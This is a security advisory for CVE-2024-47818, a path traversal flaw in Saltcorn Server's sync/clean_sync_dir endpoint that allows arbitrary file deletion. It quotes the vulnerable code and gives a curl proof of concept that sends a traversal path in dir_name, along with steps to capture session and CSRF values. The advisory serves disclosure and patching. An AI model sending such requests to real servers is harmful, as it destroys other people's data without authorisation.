GHSA-43f3-h63w-p6f6

Опубликовано: 07 окт. 2024

Источник: github

Github: Прошло ревью

CVSS4: 7.1

CVSS3: 6.5

Описание

Saltcorn Server allows logged-in users to delete arbitrary files because of a path traversal vulnerability

Summary

A logged-in user with any role can delete arbitrary files on the filesystem by calling the sync/clean_sync_dir endpoint. The dir_name POST parameter is not validated/sanitized and is used to construct the syncDir that is deleted by calling fs.rm.

Details

file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.15/packages/server/routes/sync.js#L337-L346

router.post( "/clean_sync_dir", error_catcher(async (req, res) => { const { dir_name } = req.body; // [1] source try { const rootFolder = await File.rootFolder(); const syncDir = path.join( rootFolder.location, "mobile_app", "sync", dir_name // [2] ); await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink res.status(200).send(""); } catch (error) { getState().log(2, `POST /sync/clean_sync_dir: '${error.message}'`); res.status(400).json({ error: error.message || error }); } }) );

PoC

The following PoC can be executed with a user with any role (admin, staff, user, public)

create a file in a folder different from where the server is started:

touch /tmp/secret cat /tmp/secret

log with a user and retrieve valid connect.sid and _csrf values***
send the following curl request

curl -i -X $'POST' \ -H $'Host: localhost:3000' \ -H $'Content-Type: application/x-www-form-urlencoded' \ -H $'Content-Length: 93' \ -H $'Origin: http://localhost:3000' \ -H $'Connection: close' \ -b $'connect.sid=VALID_CONNECT_SID_COOKIE; loggedin=true' \ --data-binary $'_csrf=VALID_CSRF_VALUE&dir_name=/../../../../../../../../../../tmp/secret' \ $'http://localhost:3000/sync/clean_sync_dir'

check if the file previously created does not exist anymore:

cat /tmp/secret cat: /tmp/secret: No such file or directory

*** obtain connect.sid and _csrf values

A possible way to retrieve connect.sid and _csrf values is to use the password reset functionality:

log in
open the browser developer console, go to the Network tab filter for settings request
visit http://localhost:3000/auth/settings
trigger the change password functionality
under the Headers and Request tabs, grab the connect.sid and _csrf values and replace them in the curl command

Impact

Arbitrary file delete

Recommended Mitigation

Resolve the syncDir and check if it starts with rootFolder.location/mobile_app/sync.

Ссылки

Пакеты

Наименование

@saltcorn/server

npm

Затронутые версииВерсия исправления

<= 1.0.0-beta.15

1.0.0-beta.16

EPSS

Процентиль: 42%

0.00205

Низкий

7.1 High

CVSS4

6.5 Medium

CVSS3

CVE ID

CVE-2024-47818

Дефекты

CWE-22

Связанные уязвимости

CVE-2024-47818

CVSS3: 6.5

nvd

больше 1 года назад

Saltcorn is an extensible, open source, no-code database application builder. A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`. This issue has been addressed in release version 1.0.0-beta16 and all users are advised to upgrade. There are no known workarounds for this vulnerability.

EPSS

Процентиль: 42%

0.00205

Низкий

7.1 High

CVSS4

6.5 Medium

CVSS3

CVE ID

CVE-2024-47818

Дефекты

CWE-22